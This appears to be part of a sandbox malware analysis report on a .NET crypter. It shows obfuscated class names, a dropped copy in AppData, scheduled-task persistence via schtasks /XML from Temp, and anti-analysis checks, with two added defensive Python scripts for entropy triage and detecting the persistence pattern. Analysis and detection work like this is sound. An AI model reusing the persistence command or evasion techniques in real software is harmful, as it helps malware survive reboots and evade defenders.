Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | High entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/VDWvhfkhVNLBgIpXl5.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'wYyoOGAXNE', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V', 't6shnEPT5Z', 'VT9h232c2x'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.cs | High entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe (dropped file)
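Taken together, the Data Obfuscation indicators above describe a .NET crypter: a decrypted byte array handed to AppDomain::Load, GetDelegateForFunctionPointer resolved through reflection, a .text section with entropy 7.46 (near the 8.0 maximum, where plain CIL normally sits well below 7), and class methods renamed to random strings. The script below is an added example written for this edit; it is not code from the Joe Sandbox report or from the sample. It is a pure-standard-library PE section walker that computes Shannon entropy per section and flags executable sections above a threshold, with the same entropy function applied to concatenated method names, which is the metric the report applies per class. To run offline it builds a constructed two-section PE32 in memory (not loadable, only the header fields the parser reads are meaningful); the 7.0 section threshold and 5.0 identifier threshold are assumptions, OBFUSCATED_NAMES is copied from the report's O3Y8Pm4FFyAsLyNFYF.cs entry, and PLAIN_NAMES is a constructed comparison list.

```python
"""Static entropy checks for a packed .NET sample: PE section entropy and method-name entropy.

Added example; pure standard library. pe_sections() accepts any PE image as bytes,
build_test_pe() constructs a synthetic one so the script runs without a sample.
"""
import hashlib
import math
import struct

# Section characteristic bits (winnt.h); the report lists the first three for .text.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000

SECTION_ENTROPY_THRESHOLD = 7.0   # assumption: encrypted/compressed code sits above this
NAME_ENTROPY_THRESHOLD = 5.0      # assumption: English-like identifiers stay well below this


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of data: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(pe: bytes) -> list:
    """Walk the section table of a PE32/PE32+ image held in memory."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, off + 8)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        data = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "characteristics": chars,
                         "raw_size": raw_size, "entropy": shannon_entropy(data)})
    return sections


def flag_packed_sections(pe: bytes, threshold: float = SECTION_ENTROPY_THRESHOLD) -> list:
    """Executable sections whose entropy suggests encrypted or compressed code."""
    return [s for s in pe_sections(pe)
            if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] >= threshold]


def name_entropy(names: list) -> float:
    """Entropy of the concatenated identifiers, the per-class metric used in the report."""
    return shannon_entropy("".join(names).encode("ascii", "replace"))


# Method names quoted in the report for Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs.
OBFUSCATED_NAMES = ['.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG',
                    'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV']
# Constructed list of ordinary C# method names for comparison.
PLAIN_NAMES = ['Dispose', 'Initialize', 'GetSetting', 'SetSetting', 'LoadSettings',
               'SaveSettings', 'OnStart', 'OnStop', 'Reset', 'ToString']


def _pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for an encrypted payload."""
    out, cur = bytearray(), seed
    while len(out) < n:
        cur = hashlib.sha256(cur).digest()
        out += cur
    return bytes(out[:n])


def build_test_pe() -> bytes:
    """Constructed minimal PE32: an encrypted-looking .text and a low-entropy .rsrc."""
    text_data = _pseudo_random(4096)
    rsrc_data = b"A" * 3072 + bytes(range(256)) * 4
    e_lfanew, opt_size, num_sections = 0x80, 224, 2
    headers_end = e_lfanew + 24 + opt_size + 40 * num_sections
    first_raw = (headers_end + 0x1FF) & ~0x1FF        # 0x200 file alignment

    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, num_sections, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic

    table, raw_ptr = b"", first_raw
    for name, data, chars in (
        (b".text", text_data, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".rsrc", rsrc_data, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    ):
        table += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(data), 0x1000, len(data),
                                                    raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += len(data)
    headers = (bytes(dos) + coff + bytes(opt) + table).ljust(first_raw, b"\0")
    return headers + text_data + rsrc_data


if __name__ == "__main__":
    image = build_test_pe()
    for s in pe_sections(image):
        print(f"{s['name']:<8} size={s['raw_size']:<6} entropy={s['entropy']:.3f}")
    print("packed:", [s["name"] for s in flag_packed_sections(image)])
    print(f"obfuscated names: {name_entropy(OBFUSCATED_NAMES):.2f} bits/char")
    print(f"plain names:      {name_entropy(PLAIN_NAMES):.2f} bits/char")
```

Against a real sample, read the file into bytes and pass it to flag_packed_sections(); section entropy alone is a triage signal, not a verdict, since legitimately compressed resources or embedded certificates also score high, which is why the check is restricted to IMAGE_SCN_MEM_EXECUTE sections and is best read alongside the Assembly.Load and reflection indicators listed above.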

              Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process created: C:\Windows\SysWOW64\schtasks.exe, command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp"
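The persistence mechanism is the one the Sigma rule "Scheduled temp file as task from temp location" keys on: the sample writes a task definition to %TEMP% (tmp152E.tmp, later tmpCC0B.tmp from the dropped copy), registers it as Updates\nrQtAokXKaSn with schtasks /Create /XML, and the parent of schtasks.exe is an unsigned binary running from Desktop or AppData\Roaming rather than a system path. The Python below is an added detection example written for this edit, not part of the Joe Sandbox report or of the sample. It parses schtasks command lines from Sysmon-style process-creation events (ParentImage, Image, CommandLine) and reports a finding when the /XML definition is read from a Temp directory and/or the parent runs from a user-writable location. The events are constructed to mirror the command lines in this report plus two benign ones; the field names, directory patterns and the decision to treat either condition as reportable are assumptions.

```python
"""Flag schtasks.exe persistence staged through a Temp-directory XML definition.

Added detection example; runs over constructed Sysmon-style process-creation
events rather than the sandbox's own logs.
"""
import re
import shlex
from dataclasses import dataclass

# Constructed events: the first two mirror the report's command lines, the rest are benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe",
     "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp"'},
    {"ParentImage": r"C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe",
     "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" '
                    r'/XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /TN "Backup\Nightly" '
                    r'/TR "C:\Program Files\Backup\run.exe" /SC DAILY /ST 02:00'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Query /TN "Backup\Nightly"'},
]

# Assumed path patterns: where a task body should not be staged, and where a
# legitimate installer or admin tool should not be running from.
TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Temp)\\", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(?:Desktop|Downloads|Public|AppData\\(?:Roaming|Local))\\", re.IGNORECASE)


@dataclass
class Finding:
    parent: str
    task_name: str
    xml_path: str
    reasons: tuple


def parse_schtasks_args(command_line: str) -> dict:
    """Map lower-cased /switches to their values; switches without a value map to ''."""
    tokens = shlex.split(command_line, posix=False)   # non-POSIX: backslashes stay literal
    args, i = {}, 1                                    # tokens[0] is the executable
    while i < len(tokens):
        tok = tokens[i].strip('"')
        if tok.startswith("/"):
            nxt = tokens[i + 1].strip('"') if i + 1 < len(tokens) else ""
            if nxt and not nxt.startswith("/"):
                args[tok.lower()] = nxt
                i += 2
                continue
            args[tok.lower()] = ""
        i += 1
    return args


def assess(event: dict):
    """Return a Finding for a suspicious schtasks /Create, else None."""
    if not event["Image"].lower().endswith("\\schtasks.exe"):
        return None
    args = parse_schtasks_args(event["CommandLine"])
    if "/create" not in args:
        return None
    reasons = []
    xml_path = args.get("/xml", "")
    if xml_path and TEMP_DIR_RE.search(xml_path):
        reasons.append("task definition read from a Temp directory")
    if USER_WRITABLE_RE.search(event["ParentImage"]):
        reasons.append("parent process runs from a user-writable path")
    if not reasons:
        return None
    return Finding(event["ParentImage"], args.get("/tn", ""), xml_path, tuple(reasons))


def scan(events: list) -> list:
    """Apply assess() to every event and keep the findings."""
    return [f for f in map(assess, events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"task {f.task_name!r} from {f.xml_path!r}; parent {f.parent}; "
              + ", ".join(f.reasons))
```

The /XML form is worth matching separately from /TR because the task body (trigger, action, run level) lives in the XML file rather than on the command line, so a command-line-only rule that looks for suspicious /TR targets never sees it; the temp file is also usually deleted immediately after registration, which is why the schtasks process-creation event, not the file, is the durable artifact.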
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 4748Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1572Thread sleep count: 9837 > 30Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99734s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99623s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99388s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99252s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99130s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -99000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98888s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98779s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98558s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98164s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -98047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97608s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97387s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -97031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96918s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96624s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96514s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96294s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96186s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -96078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95640s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95530s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95310s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95187s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -95078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94969s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748Thread sleep time: -94484s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 3476 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 4636 | Thread sleep count: 9758 > 30
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99764s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99546s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99323s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99218s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99109s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -99000s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -98725s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -98604s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -98484s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -98296s >= -30000s
Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 | Thread sleep time: -98186s >= -30000s
